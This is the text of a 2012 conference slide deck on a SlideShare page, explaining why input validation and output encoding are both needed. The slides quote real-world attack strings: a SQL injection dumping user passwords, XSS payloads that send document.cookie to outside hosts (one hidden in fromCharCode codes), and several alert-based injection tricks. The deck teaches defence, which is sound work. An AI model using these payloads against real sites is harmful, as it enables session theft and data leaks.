SlideShare a Scribd company logo

IWYGWYETG - Is What You Get What You Expect to Get

Philip Tellis
Philip Tellis

The document discusses input validation and output encoding to prevent vulnerabilities like XSS and SQL injection. It provides examples of how unexpected input can enable attacks, like special characters or invalid data types being passed to endpoints and rendered unencoded. The key lessons are that input validation is needed to receive clean, expected data, while output encoding is crucial to prevent exploits when displaying data to users. Both techniques are important defenses that address different but related issues.

TechnologySpiritual
1 of 61
Download to read offline
Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
IWYGWYETG ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
$ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
WARNING ! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
< > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
Let’s look at a few examples ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
<?php $id = htmlspecialchars($_GET[ ’id’ ]); ?> ... value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
<a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
<a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
use the quotes luke <a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
The char codes translate to: <img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
<?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
So what’s the common theme here? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
Input Validation is a data quality issue ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
But it always results in bad data ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
I expected the regex to reject this text ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
;( ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
<?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES); ?> <input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
<input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
Questions? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44

Recommended

Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaArden Kirkland
 
The Evolution of the Accounting Localizations
The Evolution of the Accounting LocalizationsThe Evolution of the Accounting Localizations
The Evolution of the Accounting LocalizationsOdoo
 
"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source code"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source codeDaniel_Rhodes
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Craig Francis
 
123
123123
123Mohamed Al Dalgamouni
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4Federico Damián Lozada Mosto
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQLSanketkumar Biswas
 
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slidesDEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slidesFelipe Prado
 

Recommended

Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaArden Kirkland
 
The Evolution of the Accounting Localizations
The Evolution of the Accounting LocalizationsThe Evolution of the Accounting Localizations
The Evolution of the Accounting LocalizationsOdoo
 
"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source code"Internationalisation with PHP and Intl" source code
"Internationalisation with PHP and Intl" source codeDaniel_Rhodes
 
Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Proposed PHP function: is_literal()
Proposed PHP function: is_literal()Craig Francis
 
123
123123
123Mohamed Al Dalgamouni
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4Federico Damián Lozada Mosto
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQLSanketkumar Biswas
 
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slidesDEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slidesFelipe Prado
 
Xcd pg
Xcd pgXcd pg
Xcd pgCompaniaDekartSRL
 
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusAzure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusKnowledge & Experience
 
PHP for Grown-ups
PHP for Grown-upsPHP for Grown-ups
PHP for Grown-upsManuel Lemos
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better SecurityColin O'Dell
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
CO2 sequestration in a different manner
CO2 sequestration in a different mannerCO2 sequestration in a different manner
CO2 sequestration in a different mannerGreen Minerals B.V.
 
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمتفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمIslamic Invitation
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Daniel Schneller
 
Ruby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersRuby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersAaron Patterson
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using phpRishabh Srivastava
 
Clean code
Clean codeClean code
Clean codeiamAnaCortes
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane codeFuture Processing
 
civil vs common law
civil vs common lawcivil vs common law
civil vs common lawvijay chittiboyina
 
Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Damien Seguy
 
Webit expo Standard Product
Webit expo Standard ProductWebit expo Standard Product
Webit expo Standard ProductBoji Ditcheva
 
Arabic uae e_services_user_manual
Arabic uae e_services_user_manualArabic uae e_services_user_manual
Arabic uae e_services_user_manualConfidential
 
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)James Titcumb
 
Comparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlComparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlJason Stajich
 
Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Philip Tellis
 
Javascript charting with YUI-Flot
Javascript charting with YUI-FlotJavascript charting with YUI-Flot
Javascript charting with YUI-FlotPhilip Tellis
 

More Related Content

What's hot

Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusAzure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusKnowledge & Experience
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better SecurityColin O'Dell
 
CO2 sequestration in a different manner
CO2 sequestration in a different mannerCO2 sequestration in a different manner
CO2 sequestration in a different mannerGreen Minerals B.V.
 
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمتفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمIslamic Invitation
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Daniel Schneller
 
Ruby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersRuby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersAaron Patterson
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using phpRishabh Srivastava
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane codeFuture Processing
 
Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Damien Seguy
 
Webit expo Standard Product
Webit expo Standard ProductWebit expo Standard Product
Webit expo Standard ProductBoji Ditcheva
 
Arabic uae e_services_user_manual
Arabic uae e_services_user_manualArabic uae e_services_user_manual
Arabic uae e_services_user_manualConfidential
 
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)James Titcumb
 
Comparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlComparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlJason Stajich
 

What's hot (20)

Xcd pg
Xcd pgXcd pg
Xcd pg
 
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with MovidiusAzure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
 
PHP for Grown-ups
PHP for Grown-upsPHP for Grown-ups
PHP for Grown-ups
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
CO2 sequestration in a different manner
CO2 sequestration in a different mannerCO2 sequestration in a different manner
CO2 sequestration in a different manner
 
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلمتفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
تفسير العشر الأخير من القران الكريم ويليه احكام تهم المسلم
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016
 
Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!Man in the Middle? - No, thank you!
Man in the Middle? - No, thank you!
 
Ruby on Rails: Tasty Burgers
Ruby on Rails: Tasty BurgersRuby on Rails: Tasty Burgers
Ruby on Rails: Tasty Burgers
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
 
Clean code
Clean codeClean code
Clean code
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code[FDD 2017] Mark Seemann - Humane code
[FDD 2017] Mark Seemann - Humane code
 
civil vs common law
civil vs common lawcivil vs common law
civil vs common law
 
Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020Top 10 php classic traps DPC 2020
Top 10 php classic traps DPC 2020
 
Webit expo Standard Product
Webit expo Standard ProductWebit expo Standard Product
Webit expo Standard Product
 
Arabic uae e_services_user_manual
Arabic uae e_services_user_manualArabic uae e_services_user_manual
Arabic uae e_services_user_manual
 
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)Dip Your Toes in the Sea of Security (PHP South Africa 2017)
Dip Your Toes in the Sea of Security (PHP South Africa 2017)
 
Comparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerlComparative Genomics with GMOD and BioPerl
Comparative Genomics with GMOD and BioPerl
 

Viewers also liked

Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Philip Tellis
 
Javascript charting with YUI-Flot
Javascript charting with YUI-FlotJavascript charting with YUI-Flot
Javascript charting with YUI-FlotPhilip Tellis
 
Boomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetupBoomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetupPhilip Tellis
 
MySQL Business Continuity Planning
MySQL Business Continuity PlanningMySQL Business Continuity Planning
MySQL Business Continuity PlanningPhilip Tellis
 
Websites on overdrive
Websites on overdriveWebsites on overdrive
Websites on overdrivePhilip Tellis
 
Improving D3 Performance with CANVAS and other Hacks
Improving D3 Performance with CANVAS and other HacksImproving D3 Performance with CANVAS and other Hacks
Improving D3 Performance with CANVAS and other HacksPhilip Tellis
 

Viewers also liked (7)

Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010Boomerang at FOSS.IN/2010
Boomerang at FOSS.IN/2010
 
Javascript charting with YUI-Flot
Javascript charting with YUI-FlotJavascript charting with YUI-Flot
Javascript charting with YUI-Flot
 
Boomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetupBoomerang at the Boston Web Performance meetup
Boomerang at the Boston Web Performance meetup
 
MySQL Business Continuity Planning
MySQL Business Continuity PlanningMySQL Business Continuity Planning
MySQL Business Continuity Planning
 
Over The Top Video
Over The Top VideoOver The Top Video
Over The Top Video
 
Websites on overdrive
Websites on overdriveWebsites on overdrive
Websites on overdrive
 
Improving D3 Performance with CANVAS and other Hacks
Improving D3 Performance with CANVAS and other HacksImproving D3 Performance with CANVAS and other Hacks
Improving D3 Performance with CANVAS and other Hacks
 

Similar to IWYGWYETG - Is What You Get What You Expect to Get

Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 
Zend Certification PHP 5 Sample Questions
Zend Certification PHP 5 Sample QuestionsZend Certification PHP 5 Sample Questions
Zend Certification PHP 5 Sample QuestionsJagat Kothari
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
Dealing With Legacy PHP Applications
Dealing With Legacy PHP ApplicationsDealing With Legacy PHP Applications
Dealing With Legacy PHP ApplicationsViget Labs
 
C#7, 7.1, 7.2, 7.3 e C# 8
C#7, 7.1, 7.2, 7.3 e C# 8C#7, 7.1, 7.2, 7.3 e C# 8
C#7, 7.1, 7.2, 7.3 e C# 8Giovanni Bassi
 
Becoming a better WordPress Developer
Becoming a better WordPress DeveloperBecoming a better WordPress Developer
Becoming a better WordPress DeveloperJoey Kudish
 
Ruby on Rails For Java Programmers
Ruby on Rails For Java ProgrammersRuby on Rails For Java Programmers
Ruby on Rails For Java Programmerselliando dias
 
Error Management: Future vs ZIO
Error Management: Future vs ZIOError Management: Future vs ZIO
Error Management: Future vs ZIOJohn De Goes
 
HTML5 and Other Modern Browser Game Tech
HTML5 and Other Modern Browser Game TechHTML5 and Other Modern Browser Game Tech
HTML5 and Other Modern Browser Game Techvincent_scheib
 
From clever code to better code
From clever code to better codeFrom clever code to better code
From clever code to better codeDror Helper
 
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backVladimir Vorontsov - Splitting, smuggling and cache poisoning come back
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia
 
Dealing with Legacy PHP Applications
Dealing with Legacy PHP ApplicationsDealing with Legacy PHP Applications
Dealing with Legacy PHP ApplicationsClinton Dreisbach
 
Questioning the status quo
Questioning the status quoQuestioning the status quo
Questioning the status quoIvano Pagano
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019Ayesh Karunaratne
 

Similar to IWYGWYETG - Is What You Get What You Expect to Get (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Big security for big data
Big security for big dataBig security for big data
Big security for big data
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 
Zend Certification PHP 5 Sample Questions
Zend Certification PHP 5 Sample QuestionsZend Certification PHP 5 Sample Questions
Zend Certification PHP 5 Sample Questions
 
Lca05
Lca05Lca05
Lca05
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
Dealing With Legacy PHP Applications
Dealing With Legacy PHP ApplicationsDealing With Legacy PHP Applications
Dealing With Legacy PHP Applications
 
C#7, 7.1, 7.2, 7.3 e C# 8
C#7, 7.1, 7.2, 7.3 e C# 8C#7, 7.1, 7.2, 7.3 e C# 8
C#7, 7.1, 7.2, 7.3 e C# 8
 
Becoming a better WordPress Developer
Becoming a better WordPress DeveloperBecoming a better WordPress Developer
Becoming a better WordPress Developer
 
Ruby on Rails For Java Programmers
Ruby on Rails For Java ProgrammersRuby on Rails For Java Programmers
Ruby on Rails For Java Programmers
 
F2E's Creeds
F2E's CreedsF2E's Creeds
F2E's Creeds
 
Error Management: Future vs ZIO
Error Management: Future vs ZIOError Management: Future vs ZIO
Error Management: Future vs ZIO
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
HTML5 and Other Modern Browser Game Tech
HTML5 and Other Modern Browser Game TechHTML5 and Other Modern Browser Game Tech
HTML5 and Other Modern Browser Game Tech
 
From clever code to better code
From clever code to better codeFrom clever code to better code
From clever code to better code
 
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backVladimir Vorontsov - Splitting, smuggling and cache poisoning come back
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
 
Dealing with Legacy PHP Applications
Dealing with Legacy PHP ApplicationsDealing with Legacy PHP Applications
Dealing with Legacy PHP Applications
 
Interpolique
